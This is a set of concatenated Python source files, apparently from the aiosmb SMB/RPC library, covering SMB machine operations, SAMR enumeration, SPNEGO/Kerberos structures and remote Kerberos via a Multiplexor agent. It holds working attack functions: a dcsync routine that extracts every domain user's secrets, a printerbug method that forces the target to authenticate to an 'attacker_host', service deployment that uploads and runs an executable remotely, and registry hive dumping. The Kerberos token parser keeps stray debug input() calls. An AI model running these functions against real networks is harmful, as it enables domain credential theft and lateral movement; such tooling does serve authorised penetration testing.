		elif service_name.upper() == 'LSAD':
			self.lsad = LSAD(self.connection)
			self.privtable['LSAD'] = False
			await rr(self.lsad.connect())
			self.privtable['LSAD'] = True
		elif service_name.upper() == 'RRP':
			self.rrp = RRP(self.connection)
			self.privtable['RRP'] = False
			await rr(self.rrp.connect())
			self.privtable['RRP'] = True
		elif service_name.upper() == 'RPRN':
			self.rprn = SMBRPRN(self.connection)
			self.privtable['RPRN'] = False
			await rr(self.rprn.connect())
			self.privtable['RPRN'] = True
		else:
			raise Exception('Unknown service name : %s' % service_name)
		return True, None
	
	@red
	async def connect_servicemanager(self):
		self.servicemanager = SMBRemoteServieManager(self.connection)
		self.privtable['SERVICEMGR'] = False
		await rr(self.servicemanager.connect())
		self.privtable['SERVICEMGR'] = True
		return True, None

	@req_srvs_gen
	async def list_shares(self):
		async for name, share_type, remark, _ in rr_gen(self.srvs.list_shares()):
			share = SMBShare(
				name = name, 
				stype = share_type, 
				remark = remark, 
				fullpath = '\\\\%s\\%s' % (self.connection.target.get_hostname_or_ip(), name)
			)
			#self.shares.append(share)
			yield share, None

	@req_srvs_gen
	async def list_sessions(self, level = 1):
		async for username, ip_addr, _ in rr_gen(self.srvs.list_sessions(level = level)):
			sess = SMBUserSession(username = username, ip_addr = ip_addr.replace('\\','').strip())
			self.sessions.append(sess)
			yield sess, None

	@req_samr_gen
	async def list_domains(self):
		async for domain, _ in rr_gen(self.samr.list_domains()):
			#self.domains.append(domain)
			yield domain, None
	
	@req_samr_gen
	async def list_localgroups(self):
		async for name, sid, _ in rr_gen(self.list_groups('Builtin')):
			yield name, sid, None

	@req_samr_gen
	async def list_groups(self, domain_name, ret_sid = True):
		"""
		Lists all groups in a given domain.
		domain_name: string
		"""
		domain_sid, _ = await rr(self.samr.get_domain_sid(domain_name))
		domain_handle, _ = await rr(self.samr.open_domain(domain_sid))
		#target_group_rids = {}
		async for name, rid, _ in rr_gen(self.samr.list_aliases(domain_handle)):
			sid = '%s-%s' % (domain_sid, rid)
			yield name, sid, None

	@req_samr_gen
	@req_lsad_gen
	async def list_group_members(self, domain_name, group_name):
		policy_handle, _ = await rr(self.lsad.open_policy2())
		domain_sid, _ = await rr(self.samr.get_domain_sid(domain_name))
		domain_handle, _ = await rr(self.samr.open_domain(domain_sid))
		target_group_rid = None
		async for name, rid, _ in rr_gen(self.samr.list_aliases(domain_handle)):
			if name == group_name:
				target_group_rid = rid
				break

		if target_group_rid is None:
			raise Exception('No group found with name "%s"' % group_name)
		
		alias_handle, _ = await rr(self.samr.open_alias(domain_handle, target_group_rid))
		async for sid, _ in rr_gen(self.samr.list_alias_members(alias_handle)):
			async for domain_name, user_name, _ in rr_gen(self.lsad.lookup_sids(policy_handle, [sid])):
				yield domain_name, user_name, sid, None


	async def list_directory(self, directory):
		await directory.list(self.connection)
		for entry in directory.get_console_output():
			yield entry

	async def put_file(self, local_path, remote_path):
		"""
		remote_path must be a full UNC path with the file name included!

		"""
		smbfile = SMBFile.from_remotepath(self.connection, remote_path)
		await smbfile.open(self.connection, 'w')
		with open(local_path, 'rb') as f:
			await smbfile.write_buffer(f)
		await smbfile.close()
		return True

	async def get_file(self, out_path, file_obj):
		with open(out_path, 'wb') as f:
			try:
				await file_obj.open(self.connection, 'r')
				while True:
					data = await file_obj.read(1024)
					if not data:
						break
					f.write(data)
			finally:
				await file_obj.close()

	async def get_file_data(self, file_obj):
		await file_obj.open(self.connection, 'r')
		async for data in file_obj.read_chunked():
			yield data

	async def del_file(self, file_path):
		await SMBFile.delete(self.connection, file_path)

	async def create_subdirectory(self, directory_name, parent_directory_obj):
		await parent_directory_obj.create_subdir(directory_name, self.connection)
		

	@req_servicemanager_gen
	async def list_services(self):
		async for service, _ in rr_gen(self.servicemanager.list()):
			yield service, None

	@req_servicemanager
	async def enable_service(self, service_name):
		res, exc = await rr(self.servicemanager.enable_service(service_name))
		return res, exc

	#@red_gen
	@req_samr_gen
	async def list_domain_users(self, target_domain = None):
		if target_domain is None:
			logger.debug('No domain defined, fetching it from SAMR')
					
							
			logger.debug('Fetching domains...')
			async for domain, _ in rr_gen(self.samr.list_domains()):
				if domain == 'Builtin':
					continue
				if target_domain is None: #using th first available
					target_domain = domain
					logger.debug('Domain available: %s' % domain)

		domain_sid, _ = await self.samr.get_domain_sid(target_domain)
		domain_handle, _ = await self.samr.open_domain(domain_sid)
		
		async for username, user_sid, err in self.samr.list_domain_users(domain_handle):
			yield username, user_sid, err

	#@red_gen
	@req_samr_gen
	async def dcsync(self, target_domain = None, target_users = []):
		if target_domain is None:
			logger.debug('No domain defined, fetching it from SAMR')
					
							
			logger.debug('Fetching domains...')
			async for domain, _ in rr_gen(self.samr.list_domains()):
				if domain == 'Builtin':
					continue
				if target_domain is None: #using th first available
					target_domain = domain
					logger.debug('Domain available: %s' % domain)
		
		async with SMBDRSUAPI(self.connection, target_domain) as drsuapi:
			try:
				await rr(drsuapi.connect())
				await rr(drsuapi.open())
			except Exception as e:
				logger.exception('Failed to connect to DRSUAPI!')
				raise e

			logger.debug('Using domain: %s' % target_domain)
			if len(target_users) > 0:
				for username in target_users:
					secrets, _ = await drsuapi.get_user_secrets(username)
					yield secrets
							
			else:
				
				domain_sid, _ = await self.samr.get_domain_sid(target_domain)
				domain_handle, _ = await self.samr.open_domain(domain_sid)
				async for username, user_sid, err in self.samr.list_domain_users(domain_handle):
					if err is not None:
						yield None, err
					logger.debug('username: %s' % username)
					secrets, _ = await rr(drsuapi.get_user_secrets(username))
					logger.debug('secrets: %s' % secrets)
					yield secrets, None

	
	@req_rrp
	async def save_registry_hive(self, hive_name, remote_path):
		#SAM C:\aaaa\sam.reg
		res, _ = await rr(self.rrp.save_hive(hive_name, remote_path))
		return True, None

	@req_servicemanager
	async def create_service(self, service_name, command, display_name = None):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		if display_name is None:
			display_name = service_name
		res, _ = await rr(self.servicemanager.create_service(service_name, display_name, command))
		return True, None


	@req_servicemanager
	async def deploy_service(self, path_to_executable, remote_path = None, service_name = None):
		"""

		remote path must be UNC
		"""
		if service_name is None:
			service_name = os.urandom(4).hex()
		if remote_path is None:
			raise NotImplementedError()

		filename = ntpath.basename(path_to_executable)
		remote_file_path = remote_path + filename
		remote_file = SMBFile.from_uncpath(remote_file_path)
		await self.put_file(path_to_executable, remote_file)
		
		command = remote_file_path

		await self.create_service(service_name, command)

		return True, None
	
	@req_rprn
	async def printerbug(self, attacker_host):
		"""
		Creates a service and starts it.
		Does not create files! there is a separate command for that!
		"""
		print('opening printer')
		handle, _ = await rr(self.rprn.open_printer('\\\\%s\x00' % self.connection.target.get_hostname_or_ip()))
		print('got handle %s' % handle)
		resp, _ = await rr(self.rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(
			handle,
			PRINTER_CHANGE_ADD_JOB,
			pszLocalMachine = '\\\\%s\x00' % attacker_host,

		))
		print('got resp! %s' % resp)
		

	async def stop_service(self):
		pass
	
	async def list_mountpoints(self):
		pass




#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

# https://www.rfc-editor.org/rfc/rfc4178.txt

from asn1crypto.core import ObjectIdentifier, Sequence, SequenceOf, Enumerated, GeneralString, OctetString, BitString, Choice, Any, Boolean
import enum
import os
import io

TAG = 'explicit'

# class
UNIVERSAL = 0
APPLICATION = 1
CONTEXT = 2


class MechType(ObjectIdentifier):
	_map = {
		'1.3.6.1.4.1.311.2.2.10': 'NTLMSSP - Microsoft NTLM Security Support Provider',
		'1.2.840.48018.1.2.2'   : 'MS KRB5 - Microsoft Kerberos 5',
		'1.2.840.113554.1.2.2'  : 'KRB5 - Kerberos 5',
		'1.2.840.113554.1.2.2.3': 'KRB5 - Kerberos 5 - User to User',
		'1.3.6.1.4.1.311.2.2.30': 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism',
}

class MechTypes(SequenceOf):
	_child_spec = MechType
	
class ContextFlags(BitString):
	_map = {
		0: 'delegFlag',
		1: 'mutualFlag',
		2: 'replayFlag',
		3: 'sequenceFlag',
		4: 'anonFlag',
		5: 'confFlag',
		6: 'integFlag',
}

class NegState(Enumerated):
	_map = {
		0: 'accept-completed',
		1: 'accept-incomplete',
		2: 'reject',
		3: 'request-mic',
}

class NegHints(Sequence):
	_fields = [
		('hintName', GeneralString, {'explicit': 0, 'optional': True}),
		('hintAddress', OctetString, {'explicit': 1, 'optional': True}),
]

# https://www.rfc-editor.org/rfc/rfc4178.txt 4.2.1
# EXTENDED IN: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-spng/8e71cf53-e867-4b79-b5b5-38c92be3d472
class NegTokenInit2(Sequence):
	#explicit = (APPLICATION, 0)
	
	_fields = [
		('mechTypes', MechTypes, {'tag_type': TAG, 'tag': 0}),
		('reqFlags', ContextFlags, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('mechToken', OctetString, {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('negHints', NegHints, {'tag_type': TAG, 'tag': 3, 'optional': True}),
		('mechListMIC', OctetString, {'tag_type': TAG, 'tag': 4, 'optional': True}),
]

# https://www.rfc-editor.org/rfc/rfc4178.txt 4.2.2

class NegTokenResp(Sequence):
	#explicit = (APPLICATION, 1)
	
	_fields = [
		('negState', NegState, {'tag_type': TAG, 'tag': 0, 'optional': True}),
		('supportedMech', MechType, {'tag_type': TAG, 'tag': 1, 'optional': True}),
		('responseToken', OctetString, {'tag_type': TAG, 'tag': 2, 'optional': True}),
		('mechListMIC', OctetString, {'tag_type': TAG, 'tag': 3, 'optional': True}),
]


class NegotiationToken(Choice):
	_alternatives = [
		('negTokenInit', NegTokenInit2, {'explicit': (CONTEXT, 0) } ),
		('negTokenResp', NegTokenResp, {'explicit': (CONTEXT, 1) } ),
]


class GSS_SPNEGO(Sequence):
	class_ = 2
	tag    = 0

	_fields = [
		('NegotiationToken', NegotiationToken),
]

### I have 0 idea where this is tandardized :(
class GSSType(ObjectIdentifier):
	_map = { 
		#'': 'SNMPv2-SMI::enterprises.311.2.2.30',
		'1.3.6.1.5.5.2': 'SPNEGO',
	}

class GSSAPI(Sequence):
	class_ = 1
	tag    = 0

	_fields = [
		('type', GSSType, {'optional': False}),
		('value', Any, {'optional': False}),
	]

	_oid_pair = ('type', 'value')
	_oid_specs = {
		'SPNEGO': NegotiationToken,
	}

# https://tools.ietf.org/html/rfc2743#page-81
# You may think this is ASN1. But it truth, it's not.
# Below is a fucking disgrace of a protocol design.
class KRB5Token:
	def __init__(self, data = None, tok_id = b'\x01\x00'):
		self.tok_id = tok_id
		self.data = data
	
	
	@staticmethod
	def from_bytes(data):
		return KRB5Token.from_buffer(io.BytesIO(data))
		
	@staticmethod
	def from_buffer(buff):
		t = KRB5Token()
		buff.read(1)
		length = -1
		x = int.from_bytes(buff.read(1), 'big', signed = False)
		input(x)
		if x <= 127:
			length = x
		else:
			x &= ~0x80
			input(x)
			length = int.from_bytes(buff.read(x), 'big', signed = False)
			input('length: %s' % length)
		oid_asn1 = buff.read(11)
		t.tok_id = int.from_bytes(buff.read(2), 'big', signed = False)
		t.data = buff.read(length-13)
		input(t.tok_id )
		return t
		
	def length_encode(self, x):
		if x <= 127:
			return x.to_bytes(1, 'big', signed = False)
		else:
			lb = x.to_bytes((x.bit_length() + 7) // 8, 'big')
			t = (0x80 | len(lb)).to_bytes(1, 'big', signed = False)
			return t+lb
		
	def to_bytes(self):
		t = b'\x60' #
		t += self.length_encode(11 + 2 + len(self.data))
		t += bytes.fromhex('06092a864886f712010202') #OID length + OID for kerberos 
		t += self.tok_id 
		t += self.data
		return t


from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.dcerpc.v5 import samr
from aiosmb.dcerpc.v5.dtypes import RPC_SID, DACL_SECURITY_INFORMATION
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb import logger
import traceback
from aiosmb.commons.utils.extb import pprint_exc
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE
from aiosmb.commons.utils.decorators import red_gen, red, rr

class SMBSAMR:
	def __init__(self, connection):
		self.connection = connection
		self.service_manager = None
		
		self.dce = None
		self.handle = None
		
		self.domain_ids = {} #sid to RPC_SID
		self.domain_handles = {} #handle to sid
		
		self.user_handles = {} #handle to domain-sid
		self.alias_handles = {} #handle to domain-sid
		
	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	@red
	async def connect(self, open = True):
		rpctransport = SMBDCEFactory(self.connection, filename=r'\samr')
		self.dce = rpctransport.get_dce_rpc()
		await rr(self.dce.connect())
		await rr(self.dce.bind(samr.MSRPC_UUID_SAMR))
		
		if open == True:
			await rr(self.open())

		return True,None	
	
	@red
	async def open(self):
		if not self.dce:
			await rr(self.connect())
		
		ans, _= await rr(samr.hSamrConnect(self.dce))
		self.handle = ans['ServerHandle']

		return True,None
	
	@red
	async def close(self):
		if self.dce:
			for dhandle in self.domain_handles:
				try:
					await self.close_handle(dhandle)
				except:
					pass
					
			for uhandle in self.user_handles:
				try:
					await self.close_handle(uhandle)
				except:
					pass
			
			try:
				await self.close_handle(self.handle)
			except:
				pass
				
			try:
				await self.dce.disconnect()
			except:
				pass
		
		return True,None
		
	@red
	async def close_handle(self, handle):
		resp, _ = await rr(samr.hSamrCloseHandle(self.dce, handle))
		return resp, None
	
	@red
	async def get_info(self, domain_handle, domainInformationClass = samr.DOMAIN_INFORMATION_CLASS.DomainGeneralInformation2):
		resp, _ = await rr(samr.hSamrQueryInformationDomain(self.dce, domain_handle, domainInformationClass = domainInformationClass))
		return resp, None
	
	@red_gen
	async def list_domains(self):
		status = NTStatus.MORE_ENTRIES
		enumerationContext = 0
		while status == NTStatus.MORE_ENTRIES:
			resp, err = await samr.hSamrEnumerateDomainsInSamServer(self.dce, self.handle, enumerationContext = enumerationContext)
			if err is not None:
				if err.error_code != NTStatus.MORE_ENTRIES.value:
					raise err
				resp = err.get_packet()
			
			for domain in resp['Buffer']['Buffer']:
				yield domain['Name'], None
			
			enumerationContext = resp['EnumerationContext']
			status = NTStatus(resp['ErrorCode'])
	
	@red
	async def get_domain_sid(self, domain_name):
		resp, _ = await rr(samr.hSamrLookupDomainInSamServer(self.dce, self.handle, domain_name))

		self.domain_ids[resp['DomainId'].formatCanonical()] = resp['DomainId']
		return resp['DomainId'].formatCanonical(), None
	
	@red
	async def open_domain(self, domain_sid, access_level = samr.MAXIMUM_ALLOWED):
		resp, _ = await rr(samr.hSamrOpenDomain(self.dce, self.handle, domainId = self.domain_ids[domain_sid], desiredAccess = access_level))
		self.domain_handles[resp['DomainHandle']] = domain_sid
		return resp['DomainHandle'], None
	
	@red_gen
	async def list_domain_users(self, domain_handle):
		user_type = samr.USER_NORMAL_ACCOUNT
		status = NTStatus.MORE_ENTRIES
		enumerationContext = 0
		while status == NTStatus.MORE_ENTRIES:
			resp, err = await samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle, user_type, enumerationContext=enumerationContext)
			if err is not None:
				if err.error_code != NTStatus.MORE_ENTRIES.value:
					raise err
				resp = err.get_packet()

			for user in resp['Buffer']['Buffer']:
				user_sid = '%s-%s' % (self.domain_handles[domain_handle], user['RelativeId'])
				yield user['Name'], user_sid, None

			enumerationContext = resp['EnumerationContext'] 
			status = NTStatus(resp['ErrorCode'])

	@red_gen	
	async def list_domain_groups(self, domain_handle):
		status = NTStatus.MORE_ENTRIES
		enumerationContext = 0
		while status == NTStatus.MORE_ENTRIES:
			resp, err = await samr.hSamrEnumerateGroupsInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
			if err is not None:
				if err.error_code != NTStatus.MORE_ENTRIES.value:
					raise err
				resp = err.get_packet()

			for group in resp['Buffer']['Buffer']:
				group_sid = '%s-%s' % (self.domain_handles[domain_handle], group['RelativeId'])
				yield group['Name'], group_sid, None
			enumerationContext = resp['EnumerationContext'] 
			status = NTStatus(resp['ErrorCode'])
			
	@red_gen
	async def enumerate_users(self, domain_handle):
		status = NTStatus.MORE_ENTRIES
		enumerationContext = 0
		while status == NTStatus.MORE_ENTRIES:
			resp, err = await samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle,  enumerationContext=enumerationContext)
			if err is not None:
				if err.error_code != NTStatus.MORE_ENTRIES.value:
					raise err
				resp = err.get_packet()

			for user in resp['Buffer']['Buffer']:
				user_sid = '%s-%s' % (self.domain_handles[domain_handle], user['RelativeId'])
				yield user['Name'], user_sid, None
			enumerationContext = resp['EnumerationContext'] 
			status = NTStatus(resp['ErrorCode'])

	@red
	async def open_user(self, domain_handle, user_id, access_level = samr.MAXIMUM_ALLOWED):
		resp, _ = await rr(samr.hSamrOpenUser(self.dce, domain_handle, userId=user_id, desiredAccess = access_level))
		self.user_handles[resp['UserHandle']] = self.domain_handles[domain_handle]
		return resp['UserHandle'], None
	
	@red
	async def get_user_info(self, user_handle, userInformationClass = samr.USER_INFORMATION_CLASS.UserGeneralInformation):
		resp, _ = await rr(samr.hSamrQueryInformationUser(self.dce, user_handle, userInformationClass = userInformationClass))
		return resp, None
	
	@red_gen
	async def get_user_group_memberships(self, user_handle):
		resp, _ = await rr(samr.hSamrGetGroupsForUser(self.dce, user_handle))
		
		for group in resp['Groups']['Groups']:
			yield '%s-%s' % (self.user_handles[user_handle], group['RelativeId']) , None

	@red_gen
	async def list_aliases(self, domain_handle):
		status = NTStatus.MORE_ENTRIES
		enumerationContext = 0
		while status == NTStatus.MORE_ENTRIES:
			resp, err = await samr.hSamrEnumerateAliasesInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
			if err is not None:
				if err.error_code != NTStatus.MORE_ENTRIES.value:
					raise err
				resp = err.get_packet()

			for alias in resp['Buffer']['Buffer']:
				yield alias['Name'] , alias['RelativeId'], None
			
			enumerationContext = resp['EnumerationContext'] 
			status = NTStatus(resp['ErrorCode'])

	@red
	async def open_alias(self, domain_handle, alias_id):
		resp, _ = await rr(samr.hSamrOpenAlias(self.dce, domain_handle, aliasId=alias_id))
		self.alias_handles[resp['AliasHandle']] = self.domain_handles[domain_handle]
		return resp['AliasHandle'], None
	
	@red_gen
	async def list_alias_members(self, alias_handle):
		resp, _ = await rr(samr.hSamrGetMembersInAlias(self.dce, alias_handle))
			
		for sidr in resp['Members']['Sids']:
			yield sidr['SidPointer'].formatCanonical(), None
	
	@red
	async def get_security_info(self, handle, securityInformation = DACL_SECURITY_INFORMATION):
		resp, _ = await rr(samr.hSamrQuerySecurityObject(self.dce, handle, securityInformation))
		return resp, None


import enum
import io

from aiosmb.protocol.smb2.command_codes import SMB2Command
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb.protocol.smb2.headers.common import SMB2HeaderFlag


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/fb188936-5050-48d3-b350-dc43059638a4
class SMB2Header_SYNC():
	def __init__(self):
		self.ProtocolId    = b'\xFESMB'
		self.StructureSize = 64
		self.CreditCharge  = None
		self.Status        = NTStatus.SUCCESS
		self.Command       = None
		self.CreditReq     = None
		self.Flags         = 0
		self.NextCommand   = 0
		self.MessageId     = None
		self.Reserved      = 0
		self.TreeId        = 0
		self.SessionId     = 0
		self.Signature     = b'\x00'*16

	@staticmethod
	def from_buffer(buff):
		hdr = SMB2Header_SYNC()
		hdr.ProtocolId = buff.read(4)
		assert hdr.ProtocolId == b'\xFESMB'
		hdr.StructureSize = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		assert hdr.StructureSize == 64
		hdr.CreditCharge = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		hdr.Status      = NTStatus(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		hdr.Command     = SMB2Command(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		hdr.CreditReq      = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		hdr.Flags       = SMB2HeaderFlag(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		hdr.NextCommand = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		hdr.MessageId   = int.from_bytes(buff.read(8), byteorder='little', signed = False)
		hdr.Reserved    = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		hdr.TreeId      = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		hdr.SessionId   = int.from_bytes(buff.read(8), byteorder='little', signed = False)
		hdr.Signature   = buff.read(16)
		return hdr

	def to_bytes(self):
		t  = self.ProtocolId
		t += self.StructureSize.to_bytes(2, byteorder = 'little', signed=False)
		t += self.CreditCharge.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Status.value.to_bytes(4, byteorder = 'little', signed=False)
		t += self.Command.value.to_bytes(2, byteorder = 'little', signed=False)
		t += self.CreditReq.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Flags.to_bytes(4, byteorder = 'little', signed=False)
		t += self.NextCommand.to_bytes(4, byteorder = 'little', signed=False)
		t += self.MessageId.to_bytes(8, byteorder = 'little', signed=False)
		t += self.Reserved.to_bytes(4, byteorder = 'little', signed=False)
		t += self.TreeId.to_bytes(4, byteorder = 'little', signed=False)
		t += self.SessionId.to_bytes(8, byteorder = 'little', signed=False)
		t += self.Signature
		return t

	def __repr__(self):
		t = '===SMB2 HEADER SYNC===\r\n'
		t += 'ProtocolId:    %s\r\n' % self.ProtocolId
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'CreditCharge:  %s\r\n' % self.CreditCharge
		t += 'Status:    %s\r\n' % self.Status.name
		t += 'Command:   %s\r\n' % self.Command.name
		t += 'CreditReq:    %s\r\n' % self.CreditReq
		t += 'Flags:     %s\r\n' % self.Flags
		t += 'NextCommand: %s\r\n' % self.NextCommand
		t += 'MessageId: %s\r\n' % self.MessageId
		t += 'Reserved:  %s\r\n' % self.Reserved
		t += 'TreeId:    %s\r\n' % self.TreeId
		t += 'SessionId: %s\r\n' % self.SessionId
		t += 'Signature: %s\r\n' % self.Signature
		return t




## 
##
## Interface to allow remote kerberos authentication via Multiplexor
## 
##
##
##
##
## TODO: RPC auth type is not implemented or tested!!!!

from aiosmb.authentication.spnego.asn1_structs import KRB5Token
from minikerberos.gssapi.gssapi import get_gssapi
from minikerberos.protocol.asn1_structs import AP_REQ, AP_REP, TGS_REP
from minikerberos.protocol.encryption import Enctype, Key, _enctype_table

from multiplexor.operator.external.sspi import KerberosSSPIClient
from multiplexor.operator import MultiplexorOperator

# SMBKerberosSSPICredential:

class SMBKerberosMultiplexor:
	def __init__(self, settings):
		self.iterations = 0
		self.settings = settings
		self.mode = 'CLIENT'
		self.ksspi = None
		self.client = None
		self.target = None
		self.gssapi = None
		self.etype = None
		self.session_key = None
		
		self.setup()
		
	def setup(self):
		return
		
	async def encrypt(self, data, message_no):
		return self.gssapi.GSS_Wrap(data, message_no)
		
	async def decrypt(self, data, message_no, direction='init', auth_data=None):
		return self.gssapi.GSS_Unwrap(data, message_no, direction=direction, auth_data=auth_data)
	
	def get_session_key(self):
		return self.session_key
	
	async def authenticate(self, authData = None, flags = None, seq_number = 0, is_rpc = False):
		#authdata is only for api compatibility reasons
		if self.ksspi is None:
			await self.start_remote_kerberos()
		try:
			if is_rpc == True:
				raise Exception('Multiplexor kerberos for RPC is not yet implemented!')
				#if self.iterations == 0:
				#	flags = ISC_REQ.CONFIDENTIALITY | \
				#			ISC_REQ.INTEGRITY | \
				#			ISC_REQ.MUTUAL_AUTH | \
				#			ISC_REQ.REPLAY_DETECT | \
				#			ISC_REQ.SEQUENCE_DETECT|\
				#			ISC_REQ.USE_DCE_STYLE
				#			
				#
				#	#token = self.ksspi.get_ticket_for_spn(self.target, flags = flags, is_rpc = True, token_data = authData)
				#	token = await self.ksspi.authenticate(self.settings.target, flags = flags, token_data = authData)
				#	print(token.hex())
				#	self.iterations += 1
				#	return token, True
				#
				#elif self.iterations == 1:
				#	flags = ISC_REQ.USE_DCE_STYLE
				#	
				#	#token = self.ksspi.get_ticket_for_spn(self.target, flags = flags, is_rpc = True, token_data = authData)
				#	token = await self.ksspi.get_ticket_for_spn(self.settings.target, flags = flags, token_data = authData)
				#	print(token.hex())
				#	
				#	
				#	aprep = AP_REP.load(token).native
				#	
				#	subkey = Key(aprep['enc-part']['etype'], self.get_session_key())
				#	
				#	cipher_text = aprep['enc-part']['cipher']
				#	cipher = _enctype_table[aprep['enc-part']['etype']]()
				#	
				#	plaintext = cipher.decrypt(subkey, 12, cipher_text)
				#	
				#	self.gssapi = get_gssapi(subkey)
				#	
				#	self.iterations += 1
				#	return token, False
				#	
				#else:
				#	raise Exception('Multiplexor Kerberos authentication exceeded maximum iteration counts')
				
			else:
				apreq, res = await self.ksspi.authenticate(self.settings.target)
				print('MULTIPLEXOR KERBEROS SSPI, APREQ: %s ERROR: %s' % (apreq, res))
				if res is None:
					self.session_key, res = await self.ksspi.get_session_key()

				return apreq, res
		except Exception as e:
			import traceback
			traceback.print_exc()
			return None

	async def start_remote_kerberos(self):
		try:
			#print(self.settings.get_url())
			#print(self.settings.agent_id)
			self.operator = MultiplexorOperator(self.settings.get_url())
			await self.operator.connect()
			#creating virtual sspi server
			server_info = await self.operator.start_sspi(self.settings.agent_id)
			#print(server_info)

			sspi_url = 'ws://%s:%s' % (server_info['listen_ip'], server_info['listen_port'])

			#print(sspi_url)
			self.ksspi = KerberosSSPIClient(sspi_url)
			await self.ksspi.connect()
		except Exception as e:
			import traceback
			traceback.print_exc()
			return None
		